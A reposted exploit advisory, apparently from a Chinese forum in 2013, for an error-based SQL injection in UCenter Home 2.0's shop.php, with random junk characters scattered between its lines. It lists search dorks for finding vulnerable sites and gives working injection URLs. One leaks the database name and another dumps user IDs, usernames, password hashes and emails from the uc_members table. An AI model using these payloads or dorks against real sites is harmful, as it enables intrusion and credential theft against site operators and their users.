" U% p% G7 c( H' j1 D7 o
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__
3 d! V( r0 e3 k* N
+ z* @3 l& i2 L2 F1 L" k 3 N, n0 h7 X1 N+ ]( L
, r4 N8 d" O( F o2 J' z3 s6 V
*/ Author : KnocKout ' f0 o6 _* X; j% q) `9 [0 u5 u
: }+ c$ T$ m L/ K" @! {, I
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers " w% g6 y0 X8 E3 y/ I$ ?
5 g; u( ~: M6 o+ V*/ Contact: knockoutr@msn.com
5 D- q, U/ g; I8 H) H! J1 o: l* E$ [* A0 W3 X/ ?3 a
*/ Cyber-Warrior.org/CWKnocKout # H3 i0 f: @# Y9 K B$ }+ i
" h$ s! K2 N! ^9 [5 u8 Z+ {
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
W. Q& W# F% r7 n! ]( e. Y" x" U; Z. l; L: l/ T8 B
Script : UCenter Home
+ m I6 G# F' `/ P, {6 n' j* K: }; `5 \
Version : 2.0 9 Y6 U# L0 }* K% k E' i; }
6 f3 ?- W) p4 n/ R( l, S; @* ?% J1 ]+ L+ `
Script HomePage : http://u.discuz.net/ * r8 J* Z2 M' N5 w' g
1 a. t& u, | K& ~8 _1 Q__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
" a! Z1 Y |- K& {
: e! e( W0 B6 x5 m% dDork : Powered by UCenter inurl:shop.php?ac=view
# U( `3 W9 r2 E* l% Z
' X" N5 w0 X4 T/ HDork 2 : inurl:shop.php?ac=view&shopid=
" B/ J3 U5 r! i% `+ q5 |5 {4 d5 l2 k/ C `! ^( M
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== * D. v/ _, J. ?7 [+ E! |
0 R* f# S. m9 p. g: _+ Y! E3 o
Vuln file : Shop.php
; P* ?1 Q' [: G8 ~
0 ~/ D! e+ ^. x3 h, y% g; k" cvalue's : (?)ac=view&shopid=
0 h" R! h+ F. p! w2 N) {9 Y8 R$ b! `" Q- ^. W; V: W2 T; E
Vulnerable Style : SQL Injection (MySQL Error Based) 4 s, G2 R" m+ H4 P
4 a @1 G3 S% A% N1 N3 i+ n
Need Metarials : Hex Conversion
' Q; a- s# b9 ?) q; i) h
# B8 [, Y6 W6 P9 l__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
: }; J0 V& Z" U% G! \- e1 c+ v
( I' P {/ z3 w; b2 w8 BYour Need victim Database name. 7 F$ [8 N$ _% a% B0 b
+ _/ I- Q7 j2 J6 b: i. I
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 1 u2 p) r+ t: b2 Y. I, g/ Z9 ]
% G8 \4 q' w3 t/ W5 f4 ~..
) ~6 i1 K5 k; j5 P3 m& m3 K) |" D* |- I
DB : Okey.
- X1 y) }3 J% q2 M
4 F0 N' z: r6 ~( A5 _1 qyour edit DB `[TARGET DB NAME]`
; W: y$ R7 h0 j2 c1 E4 l$ {- [7 F, w+ N8 G4 M* a
Example : 'hiwir1_ucenter'
2 z' ]5 k7 m9 @2 ?, D) D! |% g9 b4 S4 n
Edit : Okey. ( N/ \8 p6 L0 E) F+ t0 O
% R+ n* ]& I" Y# h: T
Your use Hex conversion. And edit Your SQL Injection Exploit.. # G, p' @( t% ?. g. n
) F' ^5 d& z7 h- ]5 ~+ ~2 d3 w y
# B, D, O5 m: Q7 F+ ]* N/ E y
( ?( Q; a* @3 T+ O$ J. ZExploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 . L: t4 |7 N {, @) u" c( y" O
|
发表于 2013-2-27 21:31:31
收藏
支持
反对